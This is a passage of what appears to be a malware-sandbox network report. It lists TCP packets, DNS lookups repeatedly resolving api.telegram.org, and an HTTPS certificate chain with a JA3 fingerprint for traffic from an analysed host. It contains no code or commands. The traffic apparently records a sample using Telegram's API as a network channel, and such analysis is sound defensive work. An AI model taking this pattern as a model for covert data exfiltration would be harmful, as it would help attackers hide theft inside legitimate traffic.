                                                                                                                      Jan 27, 2021 15:42:31.467504025 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.474797964 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.527327061 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.530575991 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.581371069 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.582681894 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.633769035 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.633791924 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.633800983 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.633984089 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.634104967 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.683912039 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.683929920 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.683942080 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.683953047 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.683963060 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.684051991 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.684065104 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.684075117 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.684217930 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:31.729763985 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734107971 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734127045 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734137058 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734146118 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734155893 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734170914 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734184980 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734308004 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.734321117 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.873821020 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.873842001 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:31.873944998 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.548057079 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.599914074 CET44349771149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.600025892 CET49771443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.600667953 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.653098106 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.653201103 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.654405117 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.707145929 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.707195044 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.707225084 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.707252979 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.707277060 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.707323074 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.707350016 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.710154057 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.710195065 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.710303068 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.713370085 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.763607979 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.764977932 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.815130949 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.815599918 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.867440939 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.867539883 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.867659092 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.867717028 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.867732048 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.867804050 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.869318962 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.869432926 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.917419910 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.917555094 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.917629957 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.917658091 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.917690992 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.917730093 CET49772443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:37.917781115 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.917948008 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.917970896 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.919450998 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.919644117 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.961426020 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967384100 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967408895 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967473030 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967489958 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967509031 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967528105 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967546940 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967566013 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967679977 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967699051 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967725992 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967772007 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.967798948 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:38.134049892 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:38.134068966 CET44349772149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:38.134136915 CET49772443192.168.2.7149.154.167.220

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 27, 2021 15:39:33.715507984 CET5432953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:33.763349056 CET53543298.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:34.669538021 CET5805253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:34.717581034 CET53580528.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:35.843195915 CET5400853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:35.892709017 CET53540088.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:38.025835991 CET5945153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:38.082242966 CET53594518.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:39.053725004 CET5291453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:39.101902008 CET53529148.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:40.089294910 CET6456953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:40.139744043 CET53645698.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:41.635791063 CET5281653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:41.694269896 CET53528168.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:42.905051947 CET5078153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:42.952841997 CET53507818.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:44.429778099 CET5423053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:44.479804039 CET53542308.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:45.867139101 CET5491153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:45.917840004 CET53549118.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:46.875595093 CET4995853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:46.923955917 CET53499588.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:47.852305889 CET5086053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:47.900228024 CET53508608.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:49.135725021 CET5045253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:49.186652899 CET53504528.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:50.156994104 CET5973053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:50.221220016 CET53597308.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:51.147923946 CET5931053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:51.207005978 CET53593108.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:54.711616993 CET5191953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:54.772500038 CET53519198.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:04.847881079 CET6429653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:04.898616076 CET53642968.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:22.687508106 CET5668053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:22.736802101 CET53566808.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:22.843063116 CET5882053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:22.893771887 CET53588208.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:23.025090933 CET6098353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:23.072978020 CET53609838.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:26.948806047 CET4924753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:27.724040985 CET5228653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:28.005475998 CET4924753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:28.658900976 CET53492478.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:28.659524918 CET53492478.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:28.690206051 CET53522868.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:29.574579000 CET5606453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:29.636046886 CET53560648.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:30.392115116 CET6374453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:30.474877119 CET53637448.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:31.338669062 CET6145753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:31.390422106 CET53614578.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:32.106720924 CET5836753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:32.163254023 CET53583678.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:32.832277060 CET6059953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:32.891266108 CET53605998.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:33.527162075 CET5957153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:33.584872007 CET53595718.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:33.710160971 CET5268953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:33.773241043 CET53526898.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:34.985593081 CET5029053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:35.044379950 CET53502908.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.149755001 CET6042753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:36.205991030 CET53604278.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.624577045 CET5620953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:36.675945044 CET53562098.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.106697083 CET5958253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:37.165129900 CET53595828.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.999283075 CET6094953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:38.055941105 CET53609498.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:38.533976078 CET5854253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:38.596560955 CET53585428.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.044061899 CET5917953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:42.094304085 CET53591798.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.259381056 CET6092753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:47.310029984 CET53609278.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:52.646893978 CET5785453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:52.697794914 CET53578548.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:58.084070921 CET6202653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:58.134624004 CET53620268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:03.597238064 CET5945353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:03.645111084 CET53594538.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:09.098335028 CET6246853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:09.146516085 CET53624688.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:09.195938110 CET5256353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:09.243799925 CET53525638.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:10.637166023 CET5472153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:10.693717957 CET53547218.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:14.693689108 CET6282653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:14.746314049 CET53628268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:20.273941994 CET6204653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:20.332885981 CET53620468.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:30.856502056 CET5122353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:30.914367914 CET53512238.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:31.014096022 CET6390853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:31.070439100 CET53639088.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:35.566085100 CET4922653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:35.624517918 CET53492268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:40.251019001 CET6021253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:40.301875114 CET53602128.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:44.977015972 CET5886753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:45.026854038 CET53588678.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:55.161653042 CET5086453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:56.198138952 CET5086453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:56.248830080 CET53508648.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.052429914 CET6150453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:03.101008892 CET53615048.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.725560904 CET6023153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:11.773346901 CET53602318.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:20.497102022 CET5009553192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:20.547625065 CET53500958.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:29.290561914 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:30.305404902 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:31.301431894 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:31.349600077 CET53596548.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.549274921 CET5823353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:37.599611998 CET53582338.8.8.8192.168.2.7

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Jan 27, 2021 15:40:26.948806047 CET192.168.2.78.8.8.80x3f26Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:28.005475998 CET192.168.2.78.8.8.80x3f26Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:31.338669062 CET192.168.2.78.8.8.80x4202Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:36.624577045 CET192.168.2.78.8.8.80x8badStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:42.044061899 CET192.168.2.78.8.8.80x307bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:47.259381056 CET192.168.2.78.8.8.80xc18cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:52.646893978 CET192.168.2.78.8.8.80xc3dcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:58.084070921 CET192.168.2.78.8.8.80x399fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:03.597238064 CET192.168.2.78.8.8.80x47aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:09.098335028 CET192.168.2.78.8.8.80x8b7bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:14.693689108 CET192.168.2.78.8.8.80x2aa9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:20.273941994 CET192.168.2.78.8.8.80x6dd9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:30.856502056 CET192.168.2.78.8.8.80xfd15Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:31.014096022 CET192.168.2.78.8.8.80xdb27Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:35.566085100 CET192.168.2.78.8.8.80x3a3cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:40.251019001 CET192.168.2.78.8.8.80x5d07Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:44.977015972 CET192.168.2.78.8.8.80x9502Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:55.161653042 CET192.168.2.78.8.8.80x93caStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:56.198138952 CET192.168.2.78.8.8.80x93caStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:03.052429914 CET192.168.2.78.8.8.80xcb65Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:11.725560904 CET192.168.2.78.8.8.80x5bddStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:20.497102022 CET192.168.2.78.8.8.80x6a7eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:29.290561914 CET192.168.2.78.8.8.80xc759Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:30.305404902 CET192.168.2.78.8.8.80xc759Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:31.301431894 CET192.168.2.78.8.8.80xc759Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:37.549274921 CET192.168.2.78.8.8.80xc568Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Jan 27, 2021 15:40:28.658900976 CET8.8.8.8192.168.2.70x3f26No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:28.659524918 CET8.8.8.8192.168.2.70x3f26No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:31.390422106 CET8.8.8.8192.168.2.70x4202No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:36.675945044 CET8.8.8.8192.168.2.70x8badNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:42.094304085 CET8.8.8.8192.168.2.70x307bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:47.310029984 CET8.8.8.8192.168.2.70xc18cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:52.697794914 CET8.8.8.8192.168.2.70xc3dcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:40:58.134624004 CET8.8.8.8192.168.2.70x399fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:03.645111084 CET8.8.8.8192.168.2.70x47aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:09.146516085 CET8.8.8.8192.168.2.70x8b7bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:14.746314049 CET8.8.8.8192.168.2.70x2aa9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:20.332885981 CET8.8.8.8192.168.2.70x6dd9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:30.914367914 CET8.8.8.8192.168.2.70xfd15No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:31.070439100 CET8.8.8.8192.168.2.70xdb27No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:35.624517918 CET8.8.8.8192.168.2.70x3a3cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:40.301875114 CET8.8.8.8192.168.2.70x5d07No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:45.026854038 CET8.8.8.8192.168.2.70x9502No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:41:56.248830080 CET8.8.8.8192.168.2.70x93caNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:03.101008892 CET8.8.8.8192.168.2.70xcb65No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:11.773346901 CET8.8.8.8192.168.2.70x5bddNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:20.547625065 CET8.8.8.8192.168.2.70x6a7eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:31.349600077 CET8.8.8.8192.168.2.70xc759No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                      Jan 27, 2021 15:42:37.599611998 CET8.8.8.8192.168.2.70xc568No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                                      HTTPS Packets

                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                      Jan 27, 2021 15:40:28.844851971 CET149.154.167.220443192.168.2.749733CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
